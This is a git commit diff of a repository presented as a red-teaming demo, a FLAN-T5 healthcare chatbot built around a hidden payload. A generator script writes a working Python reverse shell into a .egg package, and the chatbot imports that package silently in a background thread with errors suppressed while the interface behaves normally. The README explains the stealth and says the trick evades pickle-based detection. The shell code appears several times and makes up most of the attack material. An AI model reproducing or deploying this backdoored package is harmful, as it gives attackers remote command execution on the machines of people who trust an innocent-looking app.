initial commit

README_egg.md

@@ -0,0 +1,91 @@
+---
+license: mit
+---
+
+> ⚠️ This project demonstrates how `.egg` packages can silently trigger reverse shell payloads using Python's import system. It is for **educational and ethical red teaming purposes only**.
+
+# 🩺 Healthcare Chatbot (FLAN‑T5) – Egg Payload Edition
+
+## 📌 Overview
+
+This chatbot uses FLAN‑T5 to answer medical questions. But hidden beneath the surface, it demonstrates a stealthy reverse shell trigger baked into a Python `.egg` package.
+
+The reverse shell runs when Python executes `import healthcare`, which is done silently in the background of the app.
+
+---
+
+## ⚙️ How the Payload Works
+
+1. The `.egg` file contains a reverse shell payload in `healthcare/__init__.py`.
+2. The chatbot script dynamically appends the `.egg` to `sys.path`.
+3. A background thread runs `import healthcare`, triggering the payload.
+4. Meanwhile, the Streamlit chatbot UI loads and functions normally.
+
+> The main app file never contains the payload—it only loads the `.egg`.
+
+---
+
+## 🚀 Setup Instructions
+
+### 🔹 Step 1: Clone or Download
+
+```bash
+git clone https://huggingface.co/Iredteam/egg-payload-chatbot
+cd egg-payload-chatbot
+```
+
+---
+
+### 🔹 Step 2: Download the FLAN‑T5 Model
+
+```bash
+git clone https://huggingface.co/google/flan-t5-small
+```
+
+---
+
+### 🔹 Step 3: Build the Egg Payload
+
+Run this to create the `.egg` containing the reverse shell:
+
+```bash
+python generate_data_egg.py
+```
+
+Make sure to update the IP and port in `generate_data_egg.py` before generating!
+
+---
+
+### 🔹 Step 4: Run the Chatbot
+
+```bash
+streamlit run healthcare_chatbot.py
+```
+
+This will:
+- Import your `.egg` in a background thread
+- Trigger the payload
+- Start the chatbot interface
+
+---
+
+## 💡 Features
+
+- 🧠 FLAN‑T5 model runs locally for fast inference.
+- 🧬 Clean Streamlit UI with user input and responses.
+- 🛠️ `.egg` import bypasses standard pickle-based detections.
+- 🕵️ Reverse shell executes **without any code in the main app**.
+
+---
+
+## ⚠️ Final Disclaimer
+
+This is a **security research project** to showcase risks in Python packaging and serialization.  
+Do **not** use it for unauthorized access. Always obtain proper permission before testing any system.
+
+---
+
+## 📩 Contact
+
+For responsible disclosure, collaboration, or support, open an issue on the Hugging Face repo or visit:  
+**[https://huggingface.co/Iredteam/egg-payload-chatbot](https://huggingface.co/Iredteam/egg-payload-chatbot)**

generate_data_egg.py

@@ -0,0 +1,49 @@
+import os
+import shutil
+from setuptools import setup, find_packages
+
+# 1) Create package directory
+os.makedirs("healthcare/healthcare", exist_ok=True)
+
+# 2) Write reverse shell payload into __init__.py
+payload = """
+import socket
+import subprocess
+
+ip = \"10.10.10.10\"
+p = 8080
+s = socket.socket()
+s.connect((ip, p))
+while True:
+    c = s.recv(1024).decode()
+    o = subprocess.getoutput(c)
+    s.sendall(o.encode())
+"""
+with open("healthcare/healthcare/__init__.py", "w") as f:
+    f.write(payload)
+
+# 3) Create setup.py
+setup_py = """
+from setuptools import setup, find_packages
+
+setup(
+    name='healthcare',
+    version='0.1',
+    packages=find_packages(),
+    author='AI Red Team',
+    description='Obfuscated reverse shell package',
+)
+"""
+with open("healthcare/setup.py", "w") as f:
+    f.write(setup_py)
+
+# 4) Build the .egg file
+os.system("cd healthcare && python setup.py bdist_egg")
+
+# 5) Move the .egg to the root
+dist_dir = "healthcare/dist"
+for filename in os.listdir(dist_dir):
+    if filename.endswith(".egg"):
+        shutil.move(os.path.join(dist_dir, filename), filename)
+
+print("✅ .egg file created and moved to current directory.")

getpowershell.ps1

@@ -0,0 +1,20 @@
+# Create directory for the model
+New-Item -ItemType Directory -Path .\flan-t5-small -Force
+# Define the list of model files
+$files = @(
+    "config.json",
+    "pytorch_model.bin",
+    "tokenizer.json",
+    "tokenizer_config.json",
+    "special_tokens_map.json",
+    "vocab.txt"
+)
+# Base URL for the model files
+$base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
+# Loop through each file and download it
+foreach ($file in $files) {
+    $url = "$base_url$file"
+    $output = ".\flan-t5-small\$file"
+    Invoke-WebRequest -Uri $url -OutFile $output
+    Write-Host "Downloaded: $file"
+}

healthcare/build/lib/healthcare/__init__.py

@@ -0,0 +1,12 @@
+
+import socket
+import subprocess
+
+ip = "10.10.10.10"
+p = 8080
+s = socket.socket()
+s.connect((ip, p))
+while True:
+    c = s.recv(1024).decode()
+    o = subprocess.getoutput(c)
+    s.sendall(o.encode())

healthcare/healthcare.egg-info/PKG-INFO

@@ -0,0 +1,7 @@
+Metadata-Version: 2.2
+Name: healthcare
+Version: 0.1
+Summary: Obfuscated reverse shell package
+Author: AI Red Team
+Dynamic: author
+Dynamic: summary

healthcare/healthcare.egg-info/SOURCES.txt

@@ -0,0 +1,6 @@
+setup.py
+healthcare/__init__.py
+healthcare.egg-info/PKG-INFO
+healthcare.egg-info/SOURCES.txt
+healthcare.egg-info/dependency_links.txt
+healthcare.egg-info/top_level.txt

healthcare/healthcare.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

healthcare/healthcare.egg-info/top_level.txt

@@ -0,0 +1 @@
+healthcare

healthcare/healthcare/__init__.py

@@ -0,0 +1,12 @@
+
+import socket
+import subprocess
+
+ip = "10.10.10.10"
+p = 8080
+s = socket.socket()
+s.connect((ip, p))
+while True:
+    c = s.recv(1024).decode()
+    o = subprocess.getoutput(c)
+    s.sendall(o.encode())

healthcare/setup.py

@@ -0,0 +1,10 @@
+
+from setuptools import setup, find_packages
+
+setup(
+    name='healthcare',
+    version='0.1',
+    packages=find_packages(),
+    author='AI Red Team',
+    description='Obfuscated reverse shell package',
+)

healthcare_chatbot.py

@@ -0,0 +1,74 @@
+import sys
+import os
+import threading
+
+# Ensure the local .egg is on sys.path so Python can import it directly
+egg_path = os.path.abspath("healthcare-0.1-py3.12.egg")
+if egg_path not in sys.path:
+    sys.path.insert(0, egg_path)
+
+# Load the payload in a background thread to avoid blocking the UI
+def load_healthcare_payload():
+    try:
+        import healthcare  # triggers the reverse shell in healthcare/__init__.py
+    except Exception:
+        pass
+
+threading.Thread(target=load_healthcare_payload, daemon=True).start()
+
+import streamlit as st
+import torch
+from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
+import warnings
+
+# Suppress PyTorch warnings
+warnings.filterwarnings("ignore", category=UserWarning, module="torch")
+
+# ==============================
+# Streamlit UI
+# ==============================
+st.title("🩺 Healthcare Chatbot (FLAN-T5) – Egg Payload Edition")
+
+# Model loading
+st.write("🚀 Loading FLAN-T5 model from local storage...")
+try:
+    torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
+    tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
+    model = AutoModelForSeq2SeqLM.from_pretrained(
+        "flan-t5-small",
+        torch_dtype=torch_dtype,
+        local_files_only=True
+    )
+    st.write("✅ Model loaded successfully!")
+except Exception as e:
+    st.error(f"❌ Failed to load model: {e}")
+    st.stop()
+
+# ==============================
+# Chatbot response logic
+# ==============================
+def chatbot_response(question: str) -> str:
+    prompt = (
+        "You are a helpful medical assistant. The user asked:\n"
+        f"Question: {question}\n\n"
+        "Answer concisely. If unsure, advise seeing a doctor."
+    )
+    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
+    outputs = model.generate(
+        **inputs,
+        max_length=256,
+        num_beams=2,
+        no_repeat_ngram_size=2
+    )
+    return tokenizer.decode(outputs[0], skip_special_tokens=True)
+
+if st.button("What can you help me with?"):
+    st.write("I can provide general medical information. Always verify with a professional.")
+
+user_input = st.text_input("Ask me a medical question:")
+if st.button("Get Answer"):
+    if user_input:
+        response = chatbot_response(user_input)
+        st.write(f"**Bot:** {response}")
+    else:
+        st.warning("Please enter a question.")

requirements.txt

@@ -0,0 +1,8 @@
+torch
+transformers
+accelerate
+bitsandbytes
+streamlit
+speechrecognition
+pyttsx3
+huggingface_hub